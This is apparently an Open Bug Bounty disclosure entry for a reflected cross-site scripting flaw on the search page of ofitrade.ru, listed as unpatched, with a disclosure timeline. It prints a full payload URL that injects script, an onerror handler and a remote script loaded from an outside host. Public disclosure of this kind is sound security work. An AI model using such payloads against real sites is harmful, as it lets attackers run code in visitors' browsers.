ofitrade.ru XSS vulnerability

2016-01-17T11:27:00
ID OBB:125291
Type openbugbounty
Reporter st1_web
Modified 2016-01-17T11:30:00

Description

Vulnerable URL:
http://www.ofitrade.ru/cat/search/?sq=+++++%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E+++++%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSSPOSED%2F%29%3E+++++%3Cscript+src%3Dhttps%3A%2F%2Fxssposed.org%2F1.js%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 942510
Google Pagerank| 0
VIP website status:| No
Check ofitrade.ru SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 17 January, 2016 11:27 GMT
Vulnerability existence verified and confirmed| 17 January, 2016 11:30 GMT